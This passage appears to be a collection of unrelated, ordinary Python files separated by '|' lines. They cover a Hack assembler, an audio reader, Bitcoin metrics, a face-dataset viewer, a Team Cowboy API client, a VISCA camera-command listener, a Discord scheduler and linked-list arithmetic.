    Purpose: Replace all labels with corresponding instruction number and variables with corresponding memory addresses. Save result in file specified by TranslatableFileName
    I assume there are no bad lines of code
    """
    # Predefined Hack symbols: R0-R15, SCREEN (2**14 = 16384), KBD (3*2**13 = 24576)
    # and the VM pointer registers SP/LCL/ARG/THIS/THAT.
    dictio={"R0":0, "R1":1, "R2":2, "R3":3, "R4":4, "R5":5, "R6":6, "R7":7,
            "R8":8, "R9":9, "R10":10, "R11":11, "R12":12, "R13":13, "R14":14,
            "R15":15, "SCREEN":2**14, "KBD":3*2**13, "SP":0, "LCL":1, "ARG":2,
            "THIS":3, "THAT":4}
    lineCount=0
    ToTranslatable = open(CleanFileName, 'r')
    SaveIn = open(TranslatableFileName, 'w')
    SaveInList = []
    #What if a label is defined after being used the first time?? We deal with that!
    LinesToTranslatable = ToTranslatable.readlines()
    #print(LinesToTranslatable)
    # First pass: record every "(LABEL)" with the instruction number it points to.
    for line in LinesToTranslatable: #Catch all labels to avoid handling a label before its' definition
        if line[0]=="(" and line[-2]==")": #Because line[-1]=="\n"
            dictio[line[1:-2]]=lineCount #If it is 0 it'll get 0
            lineCount-=1 #Remember, labels definitions aren't translated, they point to next line
            #SaveInList.append("@"+str(dict[line[1:]])) #If it is a label we don't put it
        lineCount+=1
    varcount=16 # first free RAM address for user-defined variables
    #print(dictio)
    # Second pass: emit every real instruction, resolving @symbol references.
    for line in LinesToTranslatable: #Does it loop this one as well?
        if line[0]!='(' and line[-1]!=')':
            if line[0]=="@":
                #Deal with variable or label usage
                try:
                    int(line[1:])
                    SaveInList.append(line) #If it's a number then just put it! we don't need to do anything
                    #SaveInList.append("\n")
                except ValueError: #if it is not a number It'll raise a ValueError. If it's not a number, it's a variable (or label)
                    if line[1:-1] not in dictio: #By default only labels are here, so if a variable is not already here, then add it // line[1:-1] to avoid "@" and "\n"
                        dictio[line[1:-1]]=varcount
                        varcount+=1 #An extra variable
                    SaveInList.append("@"+str(dictio[line[1:-1]])+"\n")
            else:
                #Just put it in Translatable File It is OK, it is just a simple instruction.
                SaveInList.append(line)
    #This particular design is very good, it avoids mixing up the search for labels and the search for variables, it saves some memory, but it takes the same amount of time!! remember you need to know labels before you begin replacing them so there's always 2 for loops
    #print(dictio)
    #print(SaveInList)
    #SaveInList.append("\n")
    # NOTE(review): [:] is a no-op copy, so this only appends an extra "\n" to
    # the last command — presumably to guarantee the file ends with a newline;
    # confirm against CleanAssembly's output format.
    SaveInList[-1]=SaveInList[-1][:]+"\n"
    SaveIn.writelines(SaveInList)
    ToTranslatable.close()
    SaveIn.close()
    return
def AssembleToHackMachine(TranslatableFileName, HackFileName):
    """
    Input: Takes a TranslatableFileName (given by its name: a string).
           Takes a HackFileName file (given by its name: a string).
    Output: Produce a file in the Hack Machine language (*.hack). Saved in HackFileName
    Purpose: Translate the Translatable Assembly file into the Hack Machine
    Language, one 16-bit word per line. (Leftover debug prints removed and
    file handles now closed via context managers.)
    """
    with open(TranslatableFileName, 'r') as to_translate, \
            open(HackFileName, 'w') as save_in:
        # line[:-1] drops the trailing "\n"; TranslateCommand adds it back.
        save_in.writelines(TranslateCommand(line[:-1]) for line in to_translate)
def TranslateCommand(Command):
    """
    Input: Takes a Translatable Command
    Output: Produce a Hack Machine Language Command (16 bits plus newline)
    Purpose: Translate the given command into the corresponding Hack Machine
    Language word using the standard comp/dest/jump bit tables.
    """
    # A-instruction: "@value" -> leading 0 plus the 15-bit binary value.
    if Command[0] == '@':
        return format(int(Command[1:]), '016b') + "\n"
    # C-instruction: dest=comp;jump, where dest and jump are both optional.
    eq_pos = Command.find("=")
    semi_pos = Command.find(";")
    dest = Command[:eq_pos] if eq_pos != -1 else ""
    jump = Command[semi_pos + 1:] if semi_pos != -1 else ""
    comp = Command[eq_pos + 1: len(Command) if semi_pos == -1 else semi_pos]
    # The a-bit selects M instead of A as the second ALU operand.
    a_bit = '1' if "M" in comp else '0'
    # ALU control bits, keyed on the comp mnemonic with M folded into A.
    # Commutative spellings such as "1+D" or "M+D" are accepted as well;
    # unknown mnemonics fall back to "000000" (same as the original code).
    comp_bits = {
        "0": "101010", "1": "111111", "-1": "111010",
        "D": "001100", "A": "110000",
        "!D": "001101", "!A": "110001",
        "-D": "001111", "-A": "110011",
        "D+1": "011111", "1+D": "011111",
        "A+1": "110111", "1+A": "110111",
        "D-1": "001110", "A-1": "110010",
        "D+A": "000010", "A+D": "000010",
        "D-A": "010011", "A-D": "000111",
        "D&A": "000000", "A&D": "000000",
        "D|A": "010101", "A|D": "010101",
    }.get(comp.replace("M", "A"), "000000")
    # Destination bits: one flag each for A, D and M, in that order.
    dest_bits = "".join('1' if reg in dest else '0' for reg in "ADM")
    # Jump bits; no jump mnemonic means "000".
    jump_bits = {
        "JGT": "001", "JEQ": "010", "JGE": "011", "JLT": "100",
        "JNE": "101", "JLE": "110", "JMP": "111",
    }.get(jump, "000")
    return "111" + a_bit + comp_bits + dest_bits + jump_bits + "\n"
def TranslateCleanToHack(File="RectL.asm", Path="rect/"):
    """
    Run the full assembly pipeline on Path+File: clean the source, resolve
    labels/variables, then emit the Hack machine-code file alongside it.

    Both arguments default to the previously hard-coded values, so existing
    zero-argument calls behave exactly as before.
    """
    FileName = Path + File
    CleanFileName = Path + "Clean" + File
    TranslatableFileName = Path + "Translatable" + File
    HackFileName = Path + File[:-3] + "hack"  # swap the "asm" suffix for "hack"
    CleanAssembly(FileName, CleanFileName)
    TranslatableAssembly(CleanFileName, TranslatableFileName)
    AssembleToHackMachine(TranslatableFileName, HackFileName)
TranslateCleanToHack()
|
"""
Audio file handler
"""
import scipy.io.wavfile as wavfile
import numpy as np
class Media:
    """
    Media: I/O functionality to read audio (WAV) files.

    Parameters
    ----------
    file_path : str
        Path of the WAV file to read.
    dtype : numpy dtype, optional
        If given, the waveform is cast to this dtype; integer PCM data is
        additionally normalized into [-1, 1].
    """
    def __init__(self, file_path, dtype=None):
        self.file_path = file_path
        self._dtype = dtype
    @property
    def sample_rate(self):
        """
        Sample rate of audio file
        """
        sample_rate, _ = wavfile.read(self.file_path)
        return sample_rate
    @property
    def waveform(self):
        """
        Raw waveform of entire audio file; multi-channel input is averaged
        down to a single (mono) channel.
        """
        _, waveform = wavfile.read(self.file_path)
        if len(np.shape(waveform)) > 1:
            # Average the channels to get mono (result dtype is float64).
            waveform = np.mean(waveform, axis=1)
        if self._dtype is None or waveform.dtype == self._dtype:
            return waveform
        if np.issubdtype(waveform.dtype, np.integer):
            # Normalize integer PCM into [-1, 1]. np.iinfo is evaluated on
            # the ORIGINAL integer dtype; the old code called np.iinfo
            # unconditionally, which raises for float-typed sources.
            return waveform.astype(self._dtype) / np.iinfo(waveform.dtype).max
        return waveform.astype(self._dtype)
    @property
    def duration(self):
        """
        Length of the audio file (in seconds)
        """
        # Read the file once; previously this property re-read it twice via
        # the waveform and sample_rate properties.
        sample_rate, waveform = wavfile.read(self.file_path)
        return np.shape(waveform)[0] / float(sample_rate)
|
"""
Tunable game constants.

Change GAME_SPEED to slow things down / speed them up to see what's going on.
"""
# Global speed multiplier for the game loop.
GAME_SPEED = 1
# Usually there are a bunch of constants in this file... but...
# Maximum car velocity. NOTE(review): 2300 matches Rocket League's speed cap
# in uu/s -- confirm the unit expected by the consuming code.
MAX_CAR_VEL = 2300
# Calculate a Suite of Bitcoin Specific Metrics
#Data Science
import pandas as pd
import numpy as np
import math
import datetime as date
today = date.datetime.now().strftime('%Y-%m-%d')
import quandl
from checkonchain.general.coinmetrics_api import *
from checkonchain.general.regression_analysis import *
from checkonchain.btconchain.btc_schedule import *
class btc_add_metrics():
    """Build a suite of Bitcoin-specific on-chain metrics by combining
    Coinmetrics community data, the theoretical supply schedule, Quandl
    hashrate data and several capitalisation / pricing models.
    """
    def __init__(self):
        self.topcapconst = 35 #Top Cap = topcapconst * Avg Cap
        self.blkrew_ratio = [1.0] #PoW Reward Fraction
        self.sply_curtail = 144 #Supply curtailed to once a day
    def btc_coin(self):
        """Pulls Coinmetrics v2 API Community,
        adds early price data by Plan B (fills backwards)
        """
        df = Coinmetrics_api('btc',"2009-01-03","2019-10-07").convert_to_pd()
        #Coin age in days
        df['age_days'] = (df[['date']] - df.loc[0,['date']])/np.timedelta64(1,'D')
        #Coin age in supply issuance (fraction of the 21M cap already issued)
        df['age_sply'] = df['SplyCur'] / 21e6
        #Add in Plan B Data for Price and Market Cap
        #Create dataframe with Plan B price data before Coinmetrics has it
        print('...adding monthly Plan B PriceUSD and CapMrktCurUSD 2009-10...')
        planB_data = [
            ['01-10-2009',0.000763941940412529],
            ['01-11-2009',0.002],
            ['01-12-2009',0.002],
            ['01-01-2010',0.002],
            ['01-02-2010',0.002],
            ['01-03-2010',0.003],
            ['01-04-2010',0.0035],
            ['01-05-2010',0.0041],
            ['01-06-2010',0.04],
            ['01-07-2010',0.07]
        ]
        df_planB = pd.DataFrame(data=planB_data,columns=['date','PriceUSD'])
        df_planB['date'] = pd.to_datetime(df_planB['date'],utc=True)
        #Populate Price and fill backwards
        df['notes'] = str('')
        for i in df_planB['date']:
            df.loc[df.date==i,'PriceUSD'] = float(df_planB.loc[df_planB.date==i,'PriceUSD'])
        df['PriceUSD'] = df['PriceUSD'].fillna(method='bfill')
        # Derive market cap for the patched rows and tag them in 'notes'.
        for i in df_planB['date']:
            df.loc[df.date==i,'CapMrktCurUSD'] = df.loc[df.date==i,'PriceUSD'] * df.loc[df.date==i,'SplyCur']
            df.loc[df.date==i,'notes'] = 'PriceUSD and CapMrktCurUSD from Plan B data (@100TrillionUSD)'
        #Restructure final dataset
        df = df[[
            'date', 'blk','age_days','age_sply',
            'DailyIssuedNtv', 'DailyIssuedUSD', 'inf_pct_ann', 'S2F',
            'AdrActCnt', 'BlkCnt', 'BlkSizeByte', 'BlkSizeMeanByte',
            'CapMVRVCur', 'CapMrktCurUSD', 'CapRealUSD', 'DiffMean',
            'FeeMeanNtv','FeeMeanUSD', 'FeeMedNtv', 'FeeMedUSD', 'FeeTotNtv', 'FeeTotUSD',
            'PriceBTC', 'PriceUSD', 'PriceRealUSD', 'SplyCur',
            'TxCnt', 'TxTfrCnt', 'TxTfrValAdjNtv', 'TxTfrValAdjUSD',
            'TxTfrValMeanNtv', 'TxTfrValMeanUSD', 'TxTfrValMedNtv',
            'TxTfrValMedUSD', 'TxTfrValNtv', 'TxTfrValUSD',
            'notes'
        ]]
        return df
    def btc_sply(self,to_blk):
        """Theoretical supply schedule up to block to_blk, plus projected
        S2F and Plan B model valuations computed on the ideal supply curve."""
        df = btc_supply_schedule(to_blk).btc_supply_function()
        #Calculate projected S2F Models Valuations
        btc_s2f_model = regression_analysis().regression_constants()['btc_s2f']
        df['CapS2Fmodel'] = np.exp(
            float(btc_s2f_model['coefficient'])
            * np.log(df['S2F_ideal'])
            + float(btc_s2f_model['intercept'])
        )
        df['PriceS2Fmodel'] = df['CapS2Fmodel']/df['Sply_ideal']
        #Calc S2F Model - Bitcoins Plan B Model
        planb_s2f_model = regression_analysis().regression_constants()['planb']
        df['CapPlanBmodel'] = np.exp(
            float(planb_s2f_model['coefficient'])
            * np.log(df['S2F_ideal'])
            + float(planb_s2f_model['intercept'])
        )
        df['PricePlanBmodel'] = df['CapPlanBmodel']/df['Sply_ideal']
        return df
    def btc_sply_curtailed(self,to_blk):
        """Curtail theoretical supply curve for charting"""
        btc_sply_interval = self.sply_curtail
        df = self.btc_sply(to_blk)
        return df.iloc[::btc_sply_interval,:] #Select every 144 blocks (~daily)
    def btc_real(self):
        """Coinmetrics + Hashrate from QUANDL"""
        print('...compiling Bitcoin specific metrics (coinmetrics + supply curve)...')
        _coin = self.btc_coin()
        _blk_max = int(_coin['blk'][_coin.index[-1]])
        df = _coin[[
            'date', 'blk', 'age_days','age_sply',
            'CapMrktCurUSD', 'CapRealUSD', 'PriceUSD', 'PriceRealUSD',
            'DailyIssuedNtv', 'DailyIssuedUSD',
            'TxTfrCnt', 'TxTfrValAdjNtv', 'TxTfrValAdjUSD','TxTfrValNtv','TxTfrValUSD',
            'FeeTotNtv','FeeTotUSD',
            'S2F','inf_pct_ann', 'SplyCur',
            'DiffMean', 'notes'
        ]]
        return df
    def btc_hash(self):
        """Merge daily hashrate pulled from Quandl into the btc_real() frame."""
        #QUANDL has 50 daily query limit
        #Hashrate (GH/s --> 0.001 TH/s)
        _real = self.btc_real()
        df = pd.DataFrame()
        df['pow_hashrate_THs'] = quandl.get("BCHAIN/HRATE")['Value'] #Pull hashrate data
        df['date'] = df.index
        df = df.reset_index(drop=True)
        df['date'] = pd.to_datetime(df['date'],utc=True)
        df = pd.merge(_real,df,on='date')
        return df
    def btc_subsidy_models(self):
        """Daily PoW miner income in BTC and USD."""
        print('...Calculating Bitcoin block subsidy models...')
        df = self.btc_real()
        #Calculate PoS Return on Investment
        df['PoW_income_btc'] = df['DailyIssuedNtv']
        df['PoW_income_usd'] = df['PoW_income_btc'] * df['PriceUSD']
        return df
    def btc_pricing_models(self):
        """Capitalisation-derived pricing models: Average/Delta/Top caps,
        S2F regressions, inflow/fee caps, miner income and moving averages."""
        print('...Calculating Bitcoin pricing models...')
        _real = self.btc_real()
        df = _real
        # Average Cap and Average Price
        df['CapAvg'] = df['CapMrktCurUSD'].fillna(0.0001) #Fill not quite to zero for Log charts/calcs
        df['CapAvg'] = df['CapAvg'].expanding().mean()
        df['PriceAvg'] = df['CapAvg']/df['SplyCur']
        # Delta Cap and Delta Price
        df['CapDelta'] = df['CapRealUSD'] - df['CapAvg']
        df['PriceDelta'] =df['CapDelta']/df['SplyCur']
        # Top Cap and Top Price
        df['CapTop'] = df['CapAvg']*self.topcapconst
        df['PriceTop'] =df['CapTop']/df['SplyCur']
        #Calc S2F Model - Specific to Bitcoin (regression fitted on this data)
        btc_s2f_model = regression_analysis().ln_regression(df,'S2F','CapMrktCurUSD','date')['model_params']
        df['CapS2Fmodel'] = np.exp(float(btc_s2f_model['coefficient'])*np.log(df['S2F'])+float(btc_s2f_model['intercept']))
        df['PriceS2Fmodel'] = df['CapS2Fmodel']/df['SplyCur']
        #Calc S2F Model - Bitcoins Plan B Model
        planb_s2f_model = regression_analysis().regression_constants()['planb']
        df['CapPlanBmodel'] = np.exp(float(planb_s2f_model['coefficient'])*np.log(df['S2F'])+float(planb_s2f_model['intercept']))
        df['PricePlanBmodel'] = df['CapPlanBmodel']/df['SplyCur']
        # Inflow Cap and Inflow Price
        df['CapInflow'] = df['DailyIssuedUSD'].expanding().sum()
        df['PriceInflow'] =df['CapInflow']/df['SplyCur']
        # Fee Cap and Fee Price
        df['CapFee'] = df['FeeTotUSD'].expanding().sum()
        df['PriceFee'] =df['CapFee']/df['SplyCur']
        #Calculate Miner Income
        df['MinerIncome'] = df['CapInflow'] + df['CapFee']
        df['FeesPct'] = df['CapFee']/df['MinerIncome']
        df['MinerCap'] = df['MinerIncome'].expanding().sum()
        #Moving Averages
        df['PriceUSD_128DMA'] = df['PriceUSD'].rolling(128).mean()
        df['PriceUSD_200DMA'] = df['PriceUSD'].rolling(200).mean()
        return df
    def btc_oscillators(self):
        """NVT/RVT valuation ratios and the Mayer Multiple."""
        print('...Calculating Bitcoin Oscillators...')
        _pricing = self.btc_pricing_models()
        df = _pricing
        #Calc - NVT_28, NVT_90, NVTS, RVT_28, RVT_90, RVTS
        df['NVT_28'] = df['CapMrktCurUSD'].rolling(28).mean()/ df['TxTfrValUSD'].rolling(28).mean()
        df['NVT_90'] = df['CapMrktCurUSD'].rolling(90).mean()/df['TxTfrValUSD'].rolling(90).mean()
        df['NVTS'] = df['CapMrktCurUSD']/ df['TxTfrValUSD'].rolling(28).mean()
        df['RVT_28'] = df['CapRealUSD'].rolling(28).mean()/ df['TxTfrValUSD'].rolling(28).mean()
        df['RVT_90'] = df['CapRealUSD'].rolling(90).mean()/df['TxTfrValUSD'].rolling(90).mean()
        df['RVTS'] = df['CapRealUSD']/ df['TxTfrValUSD'].rolling(28).mean()
        #Mayer Multiple
        df['MayerMultiple'] = df['PriceUSD']/df['PriceUSD_200DMA']
        return df
#BTC_subs = btc_add_metrics().btc_subsidy_models()
|
class Stacks:
    """Base record pairing a team with a value.

    NOTE(review): Team and Value are CLASS attributes shared by all
    instances until an instance assigns its own -- confirm this is
    intentional before relying on per-instance state.
    """
    Team = ""
    Value = ""
class TeamStack(Stacks):
    """A Stacks specialisation that also tracks a lineup count.

    NOTE(review): TeamValue is a single Stacks instance created at class
    definition time and therefore shared by ALL TeamStack instances.
    """
    TeamValue = Stacks()
    Lineups = 0
|
#!/usr/bin/env python
"""A simple script to display information about faces from the facetracer dataset.
This is useful for quickly seeing all the relevant data for a given face id.
It also shows how easy it is to parse the data for your own applications.
Note that fiducial point locations are RELATIVE TO THE CROP RECTANGLE.
You can use 'grep' on the output to just show particular fields.
Dataset webpage: http://www.cs.columbia.edu/CAVE/databases/facetracer/
"""
# Usage banner printed when no face id is supplied; %s is the program name.
# (Fixed a stray apostrophe that previously trailed "v1.0" in the output.)
USAGE = '''FaceTracer dataset explorer, v1.0
Usage: %s <face id>
'''
# Column names of facestats.txt, in file order.
FIELDS = 'face_id crop_width crop_height crop_x0 crop_y0 yaw pitch roll left_eye_x0 left_eye_y0 left_eye_x1 left_eye_y1 right_eye_x0 right_eye_y0 right_eye_x1 right_eye_y1 mouth_x0 mouth_y0 mouth_x1 mouth_y1'.split()
def getLines(fname):
    """Returns all non-comment lines of fname, each split on tabs.

    (The previous docstring was copied from getLinesById and wrongly claimed
    the lines were filtered by id; this function returns every line.)
    """
    # Use a context manager so the file handle is closed deterministically;
    # the old code left it to the garbage collector.
    with open(fname) as f:
        return [l.strip().split('\t') for l in f if not l.startswith('#')]
def getLinesById(id, fname):
    """Returns the lines split by '\t' where the first element is the given id"""
    # Context manager closes the file; the old code leaked the handle.
    with open(fname) as f:
        lines = (l.strip().split('\t') for l in f if not l.startswith('#'))
        return [l for l in lines if int(l[0]) == int(id)]
def fix(s):
    """Make an identifier human-readable: underscores become spaces and
    every word is title-cased (e.g. 'left_eye_x0' -> 'Left Eye X0')."""
    words = s.split('_')
    return ' '.join(words).title()
if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print(USAGE % (sys.argv[0]))
        sys.exit()
    id = sys.argv[1]
    try:
        # Fixed fields from facestats.txt (first matching row).
        stats = getLinesById(id, 'facestats.txt')[0]
        for f, s in zip(FIELDS, stats):
            print('%s: %s' % (fix(f), s))
        # Image/page URLs from faceindex.txt.
        urls = getLinesById(id, 'faceindex.txt')[0]
        imgurl, pageurl = urls[1:]
        print('Image URL:', imgurl)
        print('Page URL:', pageurl)
        # Attribute labels from facelabels.txt (may be several rows).
        attrs = getLinesById(id, 'facelabels.txt')
        for fid, attr, label in attrs:
            print('%s: %s' % (fix(attr), fix(label)))
    except (IndexError, ValueError):
        # A non-numeric id raises ValueError; an unknown id yields no rows
        # and raises IndexError. Both mean the same to the user, so the two
        # previously duplicated except blocks are merged.
        print('Error: "%s" is an invalid id!' % (id))
|
# Read three target words, then count how often each one appears in a stream
# of words typed one per prompt, terminated by the sentinel word 'end'.
word_list_count = [0, 0, 0]  # occurrence counter per target word
word_search = []  # the three words to search for
text = ''
for _ in range(3):
    print('Введите', _ + 1, 'слово: ', end='')  # prompt: "enter word N: "
    word = input()
    word_search.append(word)
while text != 'end':
    text = input('Слово из текста: ')  # prompt: "word from the text: "
    # The comparison runs even for the sentinel itself, so searching for
    # the word 'end' would count its final occurrence once.
    for i in range(3):
        if word_search[i] == text:
            word_list_count[i] += 1
print('Подсчет слов в тексте')  # header: "word count in the text"
for i in range(3):
    print(word_search[i], ':', word_list_count[i])
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.utils.decorators import method_decorator
from django.views.generic.base import TemplateView
class HomeView(TemplateView):
    """Dashboard landing page; every request requires an authenticated user."""
    template_name = 'routes/dashboard.html'
    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        # Gate all HTTP methods behind authentication before normal dispatch.
        return super(HomeView, self).dispatch(*args, **kwargs)
|
import requests
from celery import shared_task
import logging
logger = logging.getLogger('django')
@shared_task()
def test():
    """Celery smoke-test task: prints a greeting and reports success."""
    print('Hello World')
    return True
|
"""A Team Cowboy API client."""
import hashlib
import httplib
import json
import random
import sys
import time
import urllib
class TeamCowboyException(Exception):
    """Raised when the Team Cowboy API responds with an error payload."""
    pass
class TeamCowboy(object):
    """A Team Cowboy API client.

    NOTE(review): this is Python 2 code (httplib, urllib.urlencode,
    sys.maxint, hashlib.sha1 on str) -- confirm the target interpreter
    before reuse.
    """
    def __init__(self, public_key, private_key):
        """Creates a new client.
        Args:
          public_key: The API public key.
          private_key: The API private key.
        """
        self._public_key = public_key
        self._private_key = private_key
        self._host = 'api.teamcowboy.com'
        self._path = '/v1/'
    def auth_get_user_token(self, username, password):
        """Gets an authentication token for the given user.
        Args:
          username: The username.
          password: The password.
        Returns:
          An authentication token for the given user.
        """
        params = {
            'username': username,
            'password': password
        }
        # Credentials travel in the request body, so this call forces HTTPS.
        return self._send('POST', 'Auth_GetUserToken', params, True)
    def test_get_request(self, test_param=''):
        """Sends a GET request to the test endpoint.
        Args:
          test_param: An optional string to send.
        Returns:
          A dict containing a 'helloWorld' attribute and, optionally, a 'testParam'
          attribute.
        """
        params = {'testParam': test_param}
        return self._send('GET', 'Test_GetRequest', params)
    def test_post_request(self, test_param=''):
        """Sends a POST request to the test endpoint.
        Args:
          test_param: An optional string to send.
        Returns:
          A dict containing a 'helloWorld' attribute and, optionally, a 'testParam'
          attribute.
        """
        params = {'testParam': test_param}
        return self._send('POST', 'Test_PostRequest', params)
    def user_get_teams(self, user_token, dashboard_teams_only=False):
        """Gets the teams visible to the given user.
        Args:
          user_token: The user's auth token (dict with a 'token' entry).
          dashboard_teams_only: Whether to restrict to dashboard teams.
        Returns:
          A list of teams.
        """
        params = {
            'userToken': user_token['token'],
            'dashboardTeamsOnly': '1' if dashboard_teams_only else '0'
        }
        return self._send('GET', 'User_GetTeams', params)
    def team_get_events(
        self, user_token, team_id, season_id=None, filter_type='future',
        start_date_time=None, end_date_time=None, offset=0, qty=10,
        include_rsvp_info=False):
        """Gets a list of events for a given team.
        Args:
          user_token: The user's auth token.
          team_id: The team ID.
          season_id: The season ID.
          filter_type: The search filter type.
          start_date_time: The start date from when to search.
          end_date_time: The end date until when to search.
          offset: The event offset.
          qty: The number of games to fetch.
          include_rsvp_info: Whether to include RSVP info.
        Returns:
          A list of events matching the given criteria.
        """
        params = {
            'userToken': user_token['token'],
            'teamId': str(team_id),
            'seasonId': str(season_id) if season_id else '',
            'includeRSVPInfo': 'true' if include_rsvp_info else '',
            'filter': filter_type,
            'startDateTime': start_date_time if start_date_time else '',
            'endDateTime': end_date_time if end_date_time else '',
            'offset': str(offset),
            'qty': str(qty)
        }
        return self._send('GET', 'Team_GetEvents', params)
    def _send(self, http_method, tc_method, params, use_https=False):
        """Prepares and sends a request to Team Cowboy.
        Args:
          http_method: The HTTP method to use.
          tc_method: The Team Cowboy method name.
          params: The method parameters.
          use_https: Whether to use HTTPS.
        Returns:
          A dict with response data.
        Raises:
          TeamCowboyException: When an error is returned.
        """
        # Every request carries the public key, API method name, timestamp,
        # nonce and a signature over the parameters (see _generate_signature).
        params.update({
            'api_key': self._public_key,
            'method': tc_method,
            'timestamp': str(int(time.time())),
            'nonce': str(self._generate_nonce())
        })
        params['sig'] = self._generate_signature(params, http_method)
        data = urllib.urlencode(params)
        if use_https:
            http = httplib.HTTPSConnection(self._host)
        else:
            http = httplib.HTTPConnection(self._host)
        if http_method == 'POST':
            headers = {'Content-Type': 'application/x-www-form-urlencoded'}
            http.request(http_method, self._path, data, headers)
        else:
            # Non-POST requests carry the parameters in the query string.
            http.request(http_method, '%s?%s' % (self._path, data))
        response = http.getresponse()
        result = json.loads(response.read())
        http.close()
        body = result['body']
        if 'error' in body:
            raise TeamCowboyException(body)
        return body
    def _generate_nonce(self):
        """Generates a one-time-use number.
        Team Cowboy allows any value, so long as it is unique (it is unclear how
        uniqueness is defined).
        Returns:
          A one-time-use number.
        """
        # sys.maxint exists only on Python 2.
        return random.randint(10000000, sys.maxint)
    def _generate_signature(self, params, method):
        """Generates a request signature.
        Args:
          params: A dict of request parameters.
          method: The HTTP method of the request.
        Returns:
          A signature for the HTTP request.
        """
        # Signature = SHA-1 of private_key|HTTP method|API method|timestamp|
        # nonce|sorted, url-quoted, lower-cased key=value pairs.
        encoded = [
            '%s=%s' % (urllib.quote(i).lower(), urllib.quote(params[i]).lower())
            for i in sorted(params)]
        s = '%s|%s|%s|%s|%s|%s' % (
            self._private_key, method, params['method'], params['timestamp'],
            params['nonce'], '&'.join(encoded))
        return hashlib.sha1(s).hexdigest().lower()
|
import socket
from time import sleep
import binascii
port = 52381
buffer_size = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', port))
acknowledge_message = bytearray.fromhex('90 4Y FF'.replace('Y', '1')) # 1 = socket number
completion_message = bytearray.fromhex('90 5Y FF'.replace('Y', '1'))
visca_command_dictionary = {
b'81010601':'pan',
b'81010408':'focus',
b'81010438':'autofocus',
b'81010407':'zoom',
b'8101043f':'memory',
b'81017e01':'information_display',
b'81010400':'camera_power',
b'01':'reset_sequence_number'
}
while True:
data = s.recvfrom(buffer_size)
message = data[0]
address_port = data[1]
payload_type = message[0:2]
payload_length = int(binascii.hexlify(message[2:4]), 16)
sequence_number = int(binascii.hexlify(message[4:8]), 16)
payload = binascii.hexlify(message[8:])
message_type = payload[0:8]
try:
print(sequence_number, visca_command_dictionary[message_type])
except:
print(sequence_number, payload)
s.sendto(acknowledge_message, address_port)
sleep(0.1)
s.sendto(completion_message, address_port)
|
from enum import Enum
class StatBlockType(Enum):
    """How a stat block's payload is stored."""

    ENCRYPTED = "encrypted"
    COMPRESSED = "compressed"

    def __str__(self) -> str:
        # The display form is simply the member's underlying string value.
        return str(self.value)
|
#!/usr/bin/env python
__author__ = 'yuy001'
def test1():
    """Print a greeting followed by two small arithmetic demonstrations."""
    print("Hello World")
    print(3 * 3)   # prints 9
    print(5 ** 2)  # prints 25

if __name__ == "__main__":
    test1()
|
import asyncio
from datetime import datetime
from typing import Iterable
import discord
from dateutil.relativedelta import relativedelta
from discord.ext import commands, tasks
from sqlalchemy import select
from common.db import session
from common.logging import logger
from datamodels.scheduling import ScheduledItem
from scheduling import parametric_transformer
from scheduling.types import ScheduleType
class Dispatcher(commands.Cog):
    """Background dispatcher: periodically pulls due ScheduledItems from the
    database and hands each to its type-specific handler coroutine."""
    # Seconds between polling sweeps; also used as the look-ahead window.
    task_interval = 60
    # Maps a schedule type to the coroutine that executes items of that type.
    supported_handlers = {
        ScheduleType.PARAMETRIC_TRANSFORMER: parametric_transformer.task_handler,
    }
    def __init__(self, bot: discord.Bot):
        self.bot = bot
        self.start_up = False  # guards against starting the loop twice
    @commands.Cog.listener()
    async def on_ready(self):
        # on_ready can fire again after reconnects; only start the loop once.
        if not self.start_up:
            self.job.start()
            self.start_up = True
    @tasks.loop(seconds=task_interval, reconnect=False)
    async def job(self):
        # Get all scheduled tasks within the interval
        scheduled_tasks: Iterable[ScheduledItem] = (
            session.execute(
                select(ScheduledItem)
                .where(
                    ScheduledItem.type.in_(self.supported_handlers),
                    ScheduledItem.scheduled_at
                    < datetime.utcnow() + relativedelta(seconds=self.task_interval),
                    ~ScheduledItem.done,
                )
                .order_by(ScheduledItem.scheduled_at.asc())
            )
            .scalars()
            .all()
        )
        # Sleep until the earliest task is ready
        for task in scheduled_tasks:
            scheduled_at = task.scheduled_at
            wait_time = max((scheduled_at - datetime.utcnow()).total_seconds(), 0)
            await asyncio.sleep(wait_time)
            try:
                logger.info(f"Dispatching task: {task.id}, {task.type}")
                await self.supported_handlers[task.type](self.bot, task)
                task.done = True
                session.merge(task)
                session.commit()
            except Exception:
                # NOTE(review): a failed item stays not-done, so it will be
                # picked up again on the next sweep -- confirm this retry
                # behaviour is intended.
                logger.exception("Task failed to dispatch")
                pass
|
from classes.LinkedList import *
#The digits are stored in reverse order
def addLists_rev(L1, L2):
    """Add two numbers whose digits are stored least-significant-first.

    Walks both lists in lockstep, propagating the carry, and returns a new
    LinkedList in the same reversed-digit representation.
    NOTE: Python 2 code -- "carry = dig_sum/10" relies on integer division.
    """
    p1 = L1.head
    p2 = L2.head
    carry = 0
    linkedlist_sum = LinkedList()
    while (p1 != None) or (p2 != None) or (carry != 0):
        dig_sum = carry
        if p1 != None:
            dig_sum += p1.value
            p1 = p1.next
        if p2 != None:
            dig_sum += p2.value
            p2 = p2.next
        linkedlist_sum.addNode(dig_sum%10)  # current digit
        carry = dig_sum/10  # integer division under Python 2
    return linkedlist_sum
# The digits are stored in forward order
# Iterative implementation
def addLists_fwd(L1, L2):
    """Add two numbers stored most-significant-digit first (iteratively).

    Reverses both operands, reuses the reverse-order adder, then reverses
    the sum back into forward order.
    """
    reversed_sum = addLists_rev(reverseLinkedlist(L1), reverseLinkedlist(L2))
    return reverseLinkedlist(reversed_sum)
# Recursive implementation of addLists_fwd
def addLists_fwd_2(L1, L2):
    """Add two forward-order numbers recursively.

    Pads the shorter list with leading zeros so both have equal length,
    recurses to the least-significant digit, then propagates carries back
    up; a final carry is prepended to the result.
    """
    # compare length of linked lists and pad the shorter one with 0
    l1_len = lengthOfLinkedlist(L1)
    l2_len = lengthOfLinkedlist(L2)
    if l1_len < l2_len:
        L1 = padInFront(L1, l2_len - l1_len)
    else:
        L2 = padInFront(L2, l1_len - l2_len)
    # Add lists
    sumandcarry = addListsFwd2Helper(L1.head, L2.head)
    result = LinkedList()
    result.head = sumandcarry[0]
    # If the carry is not 0, insert this at the front of the linked list
    if sumandcarry[1] != 0:
